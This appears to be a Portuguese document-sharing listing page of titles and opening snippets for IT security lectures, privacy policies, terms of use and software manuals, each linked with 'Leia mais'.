Instalação do software e de opções da Série Polycom RealPresence Group e acessórios. Visão geral Instalação do software e de opções da Série Polycom RealPresence Group e acessórios Visão geral Quando você atualiza o software Polycom ou adquire opções adicionais do sistema, sua organização pode continuar

Leia mais

Conteúdo. Introdução. Introdução Segurança da Informação Barreiras de segurança Exemplos Conclusão Bibliografia

Conteúdo. Introdução. Introdução Segurança da Informação Barreiras de segurança Exemplos Conclusão Bibliografia Segurança da informação FATEC Americana Tecnologia em Análise de Sistemas e Tecnologias da Informação Diagnóstico e solução de problemas de TI Prof. Humberto Celeste Innarelli Segurança da informação 1

Leia mais

(In)Segurança Virtual. Técnicas de Ataque e Defesa

(In)Segurança Virtual. Técnicas de Ataque e Defesa (In)Segurança Virtual Técnicas de Ataque e Defesa Expotec 2009 IFRN- Campus Mossoró Nícholas André - nicholasandreoliveira9@gmail.com www.iotecnologia.com.br Mossoró-RN Setembro-2009 O que é preciso! Engenharia

Leia mais

Tecnologia da Informação UNIDADE 3

Tecnologia da Informação UNIDADE 3 Tecnologia da Informação UNIDADE 3 *Definição * A segurança da informação está relacionada com proteção de um conjunto de dados, no sentido de preservar o valor que possuem para a organização. *Definição

Leia mais

Política de Privacidade

Política de Privacidade Política de Privacidade Este documento tem por objetivo definir a Política de Privacidade da Bricon Security & IT Solutions, para regular a obtenção, o uso e a revelação das informações pessoais dos usuários

Leia mais

Tecnologia da Informação UNIDADE 3:Estrutura organizacional de TI

Tecnologia da Informação UNIDADE 3:Estrutura organizacional de TI Tecnologia da Informação UNIDADE 3:Estrutura organizacional de TI * A segurança da informação está relacionada com proteção de um conjunto de dados, no sentido de preservar o valor que possuem para a organização.

Leia mais

Faculdade de Tecnologia SENAI Porto Alegre Aula 1

Faculdade de Tecnologia SENAI Porto Alegre Aula 1 Faculdade de Tecnologia SENAI Porto Alegre Aula 1 Prof. Me. Humberto Moura humberto@humbertomoura.com.br Evolução da TI Postura TI Níveis de TI Princípios de TI (papel da TI perante o negócio) Arquitetura

Leia mais

Rotina de Discovery e Inventário

Rotina de Discovery e Inventário 16/08/2013 Rotina de Discovery e Inventário Fornece orientações necessárias para testar a rotina de Discovery e Inventário. Versão 1.0 01/12/2014 Visão Resumida Data Criação 01/12/2014 Versão Documento

Leia mais

2013 GVDASA Sistemas Administração dos Portais

2013 GVDASA Sistemas Administração dos Portais 2013 GVDASA Sistemas Administração dos Portais 2013 GVDASA Sistemas Administração dos Portais AVISO O conteúdo deste documento é de propriedade intelectual exclusiva da GVDASA Sistemas e está sujeito a

Leia mais

Manual do usuário Certificado Digital e-cpf. Parabéns! Ao ter em mãos este manual, significa que você adquiriu um Certificado Digital DOCCLOUD

Manual do usuário Certificado Digital e-cpf. Parabéns! Ao ter em mãos este manual, significa que você adquiriu um Certificado Digital DOCCLOUD Manual do usuário Certificado Digital e-cpf Parabéns! Ao ter em mãos este manual, significa que você adquiriu um Certificado Digital DOCCLOUD Índice Apresentação 03 O que é um Certificado Digital? 04 Instalando

Leia mais

PROJETO INTEGRADOR LUIZ DAVI DOS SANTOS SOUZA

PROJETO INTEGRADOR LUIZ DAVI DOS SANTOS SOUZA PROJETO INTEGRADOR LUIZ DAVI DOS SANTOS SOUZA Os serviços IP's citados abaixo são suscetíveis de possíveis ataques, desde ataques passivos (como espionagem) até ataques ativos (como a impossibilidade de

Leia mais

Segredos do Hacker Ético

Segredos do Hacker Ético Marcos Flávio Araújo Assunção Segredos do Hacker Ético 2 a Edição Visual Books Sumário Prefácio... 21 Introdução... 23 1 Entendendo o Assunto... 25 1.1 Bem-vindo ao Obscuro Mundo da Segurança Digital...25

Leia mais

Guia do funcionário seguro

Guia do funcionário seguro Guia do funcionário seguro INTRODUÇÃO A Segurança da informação em uma empresa é responsabilidade do departamento de T.I. (tecnologia da informação) ou da própria área de Segurança da Informação (geralmente,

Leia mais

GLADIADOR INTERNET CONTROLADA v.1.2.3.9

GLADIADOR INTERNET CONTROLADA v.1.2.3.9 GLADIADOR INTERNET CONTROLADA v.1.2.3.9 Pela grande necessidade de controlar a internet de diversos clientes, a NSC Soluções em Informática desenvolveu um novo produto capaz de gerenciar todos os recursos

Leia mais

AVDS Vulnerability Management System

AVDS Vulnerability Management System DATA: Agosto, 2012 AVDS Vulnerability Management System White Paper Brazil Introdução Beyond Security tem o prazer de apresentar a nossa solução para Gestão Automática de Vulnerabilidade na núvem. Como

Leia mais

Manual do Usuário Cyber Square

Manual do Usuário Cyber Square Manual do Usuário Cyber Square Criado dia 27 de março de 2015 as 12:14 Página 1 de 48 Bem-vindo ao Cyber Square Parabéns! Você está utilizando o Cyber Square, o mais avançado sistema para gerenciamento

Leia mais

Tableau Online Segurança na nuvem

Tableau Online Segurança na nuvem Tableau Online Segurança na nuvem Autor(a): Ellie Fields Diretora Sênior de Marketing de Produtos, Tableau Software Junho de 2013 p2 A Tableau Software entende que os dados são um dos ativos mais estratégicos

Leia mais

RAPHAEL MANDARINO JUNIOR Diretor do Departamento de Segurança da Informação e Comunicações

RAPHAEL MANDARINO JUNIOR Diretor do Departamento de Segurança da Informação e Comunicações 16/IN01/DSIC/GSIPR 00 21/NOV/12 1/8 PRESIDÊNCIA DA REPÚBLICA Gabinete de Segurança Institucional Departamento de Segurança da Informação e Comunicações DIRETRIZES PARA DESENVOLVIMENTO E OBTENÇÃO DE SOFTWARE

Leia mais

Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda

Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda Segurança na rede Segurança na rede refere-se a qualquer atividade planejada para proteger sua rede. Especificamente

Leia mais

CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS

CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS Servidor: O servidor é todo computador no qual um banco de dados ou um programa (aplicação) está instalado e será COMPARTILHADO para outros computadores,

Leia mais

Política de Segurança da Informação

Política de Segurança da Informação Política de Segurança da Informação 29 de janeiro 2014 Define, em nível estratégico, diretivas do Programa de Gestão de Segurança da Informação. ÍNDICE 1 OBJETIVO... 3 2 PÚBLICO ALVO... 3 3 RESPONSABILIDADES

Leia mais

Segurança exposta em Rede de Computadores. Security displayed in Computer network

Segurança exposta em Rede de Computadores. Security displayed in Computer network Segurança exposta em Rede de Computadores Security displayed in Computer network Luiz Alexandre Rodrigues Vieira Graduando em: (Tecnologia em Redes e Ambientes Operacionais) Unibratec - União dos Institutos

Leia mais

Omega Tecnologia Manual Omega Hosting

Omega Tecnologia Manual Omega Hosting Omega Tecnologia Manual Omega Hosting 1 2 Índice Sobre o Omega Hosting... 3 1 Primeiro Acesso... 4 2 Tela Inicial...5 2.1 Área de menu... 5 2.2 Área de navegação... 7 3 Itens do painel de Controle... 8

Leia mais

Segurança da Informação e Proteção ao Conhecimento. Douglas Farias Cordeiro

Segurança da Informação e Proteção ao Conhecimento. Douglas Farias Cordeiro Segurança da Informação e Proteção ao Conhecimento Douglas Farias Cordeiro ABNT NBR ISO/IEC 27002 Segurança nas operações Responsabilidades e procedimentos operacionais Assegurar a operação segura e correta

Leia mais

NORMA TÉCNICA PARA IMPLEMENTAÇÃO DE MECANISMOS DE SEGURANÇA EM SISTEMAS UNIX. Referência: NT-AI.01.05.01. Data: 16/09/1998

NORMA TÉCNICA PARA IMPLEMENTAÇÃO DE MECANISMOS DE SEGURANÇA EM SISTEMAS UNIX. Referência: NT-AI.01.05.01. Data: 16/09/1998 NORMA TÉCNICA PARA IMPLEMENTAÇÃO DE MECANISMOS DE SEGURANÇA EM SISTEMAS UNIX Referência: NT-AI.01.05.01 http://intranet.unesp.br/ai/regulamentos/nt-ai.01.05.01.pdf Data: 16/09/1998 STATUS: EM VIGOR A Assessoria

Leia mais

G-Bar IGV. Instalação Versão 4.0

G-Bar IGV. Instalação Versão 4.0 G-Bar Software para Gerenciamento de Centrais de Corte e Dobra de Aço IGV Software Interpretador/ Gerenciador/ Visualizador de dados digitais de projetos CAD-TQS Instalação Versão 4.0 Manual do Usuário

Leia mais

Tecnologia da Informação. Prof Odilon Zappe Jr

Tecnologia da Informação. Prof Odilon Zappe Jr Tecnologia da Informação Prof Odilon Zappe Jr Antivírus Os antivírus são programas de computador concebidos para prevenir, detectar e eliminar pragas digitais. Existe uma grande variedade de produtos com

Leia mais

ORDEM DE SERVIÇO OS 002/DINFO/2014 29/10/2014. Art. 1º: Para fins de normatização da Política de Uso da Rede WIFI UERJ, com vistas a assegurar:

ORDEM DE SERVIÇO OS 002/DINFO/2014 29/10/2014. Art. 1º: Para fins de normatização da Política de Uso da Rede WIFI UERJ, com vistas a assegurar: A DIRETORIA DE INFORMÁTICA DINFO DA UNIVERSIDADE DO ESTADO DO RIO DE JANEIRO -UERJ, no uso de suas atribuições legais, estabelece: Art. 1º: Para fins de normatização da Política de Uso da Rede WIFI UERJ,

Leia mais

É desejável que o Proponente apresente sua proposta para ANS considerando a eficiência e conhecimento do seu produto/serviço.

É desejável que o Proponente apresente sua proposta para ANS considerando a eficiência e conhecimento do seu produto/serviço. 1 Dúvida: PROJETO BÁSICO Item 4.1.1.1.2 a) Entendemos que o Suporte aos usuários finais será realizado pelo PROPONENTE através de um intermédio da CONTRATANTE, que deverá abrir um chamado específico para

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Cap. 3: Visão Geral das Tecnologias de Segurança Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Projeto de segurança de Redes Page 2 Etapas: Segurança em camadas

Leia mais

TERMOS DE USO. Gestão eficiente do seu negócio

TERMOS DE USO. Gestão eficiente do seu negócio TERMOS DE USO Gestão eficiente do seu negócio SEJA BEM-VINDO AO SUASVENDAS! Recomendamos que antes de utilizar os serviços oferecidos pelo SuasVendas, leia atentamente os Termos de Uso a seguir para ficar

Leia mais

Blinde seu caminho contra as ameaças digitais. Manual do Produto. Página 1

Blinde seu caminho contra as ameaças digitais. Manual do Produto. Página 1 ] Blinde seu caminho contra as ameaças digitais Manual do Produto Página 1 O Logon Blindado é um produto desenvolvido em conjunto com especialistas em segurança da informação para proteger os clientes

Leia mais

TOP Plugins. Segurança para WordPress

TOP Plugins. Segurança para WordPress TOP Plugins Segurança para WordPress Agradecimentos Gostaria de Agradecer a Deus por conseguir concluir mais um pequeno trabalho. Sobre o Autor Tales Augusto, Analista de Sistemas, se especializando em

Leia mais

Política de uso de dados

Política de uso de dados Política de uso de dados A política de dados ajudará você a entender como funciona as informações completadas na sua área Minhas Festas. I. Informações que recebemos e como são usadas Suas informações

Leia mais

Prof. Demétrios Coutinho

Prof. Demétrios Coutinho Prof. Demétrios Coutinho Hoje em dia a informação é o bem mais valioso de uma empresa/cliente. A segurança da informação é um conjunto de medidas que se constituem basicamente de controles e política de

Leia mais

Segurança de Rede Prof. João Bosco M. Sobral 1

Segurança de Rede Prof. João Bosco M. Sobral 1 1 Sinopse do capítulo Problemas de segurança para o campus. Soluções de segurança. Protegendo os dispositivos físicos. Protegendo a interface administrativa. Protegendo a comunicação entre roteadores.

Leia mais

Curso de Tecnologia em Redes de Computadores Auditoria e Análise de Segurança da Informação - 4º período Professor: José Maurício S.

Curso de Tecnologia em Redes de Computadores Auditoria e Análise de Segurança da Informação - 4º período Professor: José Maurício S. Disciplina: Curso de Tecnologia em Redes de Computadores Auditoria e Análise de Segurança da Informação - 4º período Professor: José Maurício S. Pinheiro AULA 4: Trilhas de Auditoria Existe a necessidade

Leia mais

INSTALAÇÃO PRINTERTUX Tutorial

INSTALAÇÃO PRINTERTUX Tutorial INSTALAÇÃO PRINTERTUX Tutorial 2 1. O Sistema PrinterTux O Printertux é um sistema para gerenciamento e controle de impressões. O Produto consiste em uma interface web onde o administrador efetua o cadastro

Leia mais

Segurança com o MySQL

Segurança com o MySQL 1. Introdução Segurança com o MySQL Anderson Pereira Ataides O MySQL sem dúvida nenhuma, é o banco de dados open source mais conhecido do mercado e provavelmente o mais utilizado. Ele é rápido, simples,

Leia mais

Requisitos do Sistema

Requisitos do Sistema PJ8D - 017 ProJuris 8 Desktop Requisitos do Sistema PJ8D - 017 P á g i n a 1 Sumario Sumario... 1 Capítulo I - Introdução... 2 1.1 - Objetivo... 2 1.2 - Quem deve ler esse documento... 2 Capítulo II -

Leia mais

Guia de administração para a integração do Portrait Dialogue 6.0. Versão 7.0A

Guia de administração para a integração do Portrait Dialogue 6.0. Versão 7.0A Guia de administração para a integração do Portrait Dialogue 6.0 Versão 7.0A 2013 Pitney Bowes Software Inc. Todos os direitos reservados. Esse documento pode conter informações confidenciais ou protegidas

Leia mais

Termos de Uso Sistema Diário de Obras Online

Termos de Uso Sistema Diário de Obras Online Termos de Uso Sistema Diário de Obras Online Estes são os termos que determinarão o nosso relacionamento Este contrato refere-se ao sistema Diário de Obras Online, abrangendo qualquer uma de suas versões

Leia mais

Sistema BuildParty para montagem e gerenciamento de eventos. Plano de Testes. Versão <1.1> DeltaInfo. Soluções para web Soluções para o mundo

Sistema BuildParty para montagem e gerenciamento de eventos. Plano de Testes. Versão <1.1> DeltaInfo. Soluções para web Soluções para o mundo Sistema BuildParty para montagem e gerenciamento de eventos Plano de Testes Versão DeltaInfo Soluções para web Soluções para o mundo DeltaInfo 2 Histórico de Revisões Data Versão Descrição Autores

Leia mais

Soluções em Mobilidade

Soluções em Mobilidade Soluções em Mobilidade Soluções em Mobilidade Desafios das empresas no que se refere a mobilidade em TI Acesso aos dados e recursos de TI da empresa estando fora do escritório, em qualquer lugar conectado

Leia mais

Segurança e Auditoria de Sistemas. Conceitos básicos

Segurança e Auditoria de Sistemas. Conceitos básicos Segurança e Auditoria de Sistemas Conceitos básicos Conceitos básicos Propriedades e princípios de segurança; Ameaças; Vulnerabilidades; Ataques; Tipos de malware; Infraestrutura de segurança. Propriedades

Leia mais

REGULAMENTO E POLITICAS PARA O USO DA REDE DE COMPUTADORES DO DEPARTAMENTO DE CIÊNCIA DA COMPUTAÇÃO

REGULAMENTO E POLITICAS PARA O USO DA REDE DE COMPUTADORES DO DEPARTAMENTO DE CIÊNCIA DA COMPUTAÇÃO REGULAMENTO E POLITICAS PARA O USO DA REDE DE COMPUTADORES DO DEPARTAMENTO DE CIÊNCIA DA COMPUTAÇÃO 1. INTRODUÇÃO O presente documento define o regulamento para o uso apropriado da rede de computadores

Leia mais

07/IN01/DSIC/GSIPR 00 06/MAI/10 2/8 1. OBJETIVO

07/IN01/DSIC/GSIPR 00 06/MAI/10 2/8 1. OBJETIVO 07/IN01/DSIC/GSIPR 00 06/MAI/10 1/8 PRESIDÊNCIA DA REPÚBLICA Gabinete de Segurança Institucional Departamento de Segurança da Informação e Comunicações DIRETRIZES PARA IMPLEMENTAÇÃO DE CONTROLES DE ACESSO

Leia mais

Guia de Atualização PROJURIS WEB 4.5. Manual do Técnico Atualização - ProJuris Web 4.5. Manual do Técnico Atualização - ProJuris Web 4.

Guia de Atualização PROJURIS WEB 4.5. Manual do Técnico Atualização - ProJuris Web 4.5. Manual do Técnico Atualização - ProJuris Web 4. Guia de Atualização PROJURIS WEB 4.5 Por: Fabio Pozzebon Soares Página 1 de 11 Sistema ProJuris é um conjunto de componentes 100% Web, nativamente integrados, e que possuem interface com vários idiomas,

Leia mais

Certificado Digital. Manual do Usuário

Certificado Digital. Manual do Usuário Certificado Digital Manual do Usuário Índice Importante... 03 O que é um Certificado Digital?... 04 Instalação do Certificado... 05 Revogação do Certificado... 07 Senhas do Certificado... 08 Renovação

Leia mais

TE T R E MOS DE E US U O Carteira de Pedidos Atualizado em e 1 7 de d Ag A o g st s o o de d 2 01 0 3

TE T R E MOS DE E US U O Carteira de Pedidos Atualizado em e 1 7 de d Ag A o g st s o o de d 2 01 0 3 TERMOS DE USO Seja bem-vindo ao Carteira de Pedidos. Recomendamos que antes de utilizar os serviços oferecidos pelo Carteira de Pedidos, leia atentamente os Termos de Uso a seguir para ficar ciente de

Leia mais

BOAS PRÁTICAS DE SEGURANÇA EM TECNOLOGIA DA INFORMAÇÃO (TI)

BOAS PRÁTICAS DE SEGURANÇA EM TECNOLOGIA DA INFORMAÇÃO (TI) BOAS PRÁTICAS DE SEGURANÇA EM TECNOLOGIA DA INFORMAÇÃO (TI) André Gustavo Assessor Técnico de Informática MARÇO/2012 Sumário Contextualização Definições Princípios Básicos de Segurança da Informação Ameaças

Leia mais

Daniel Moreno. Novatec

Daniel Moreno. Novatec Daniel Moreno Novatec Novatec Editora Ltda. 2015. Todos os direitos reservados e protegidos pela Lei 9.610 de 19/02/1998. É proibida a reprodução desta obra, mesmo parcial, por qualquer processo, sem prévia

Leia mais

POLÍTICA DE SEGURANÇA DA INFORMAÇÃO. A FACILIDADE DE DERRUBAR UM SITE UTILIZANDO A NEGAÇÃO DE SERVIÇO (DoS Denial of Service)

POLÍTICA DE SEGURANÇA DA INFORMAÇÃO. A FACILIDADE DE DERRUBAR UM SITE UTILIZANDO A NEGAÇÃO DE SERVIÇO (DoS Denial of Service) POLÍTICA DE SEGURANÇA DA INFORMAÇÃO A FACILIDADE DE DERRUBAR UM SITE UTILIZANDO A NEGAÇÃO DE SERVIÇO (DoS Denial of Service) Segurança em Redes de Computadores FACULDADE LOURENÇO FILHO Setembro/2014 Prof.:

Leia mais

Renovação Online de certificados digitais A1 (Voucher)

Renovação Online de certificados digitais A1 (Voucher) Renovação Online de certificados digitais A1 (Voucher) Todos os direitos reservados. Imprensa Oficial do Estado S.A. 2012 página 1 de 18 Renovação Online Renovação Online de certificados digitais A1 (Voucher)

Leia mais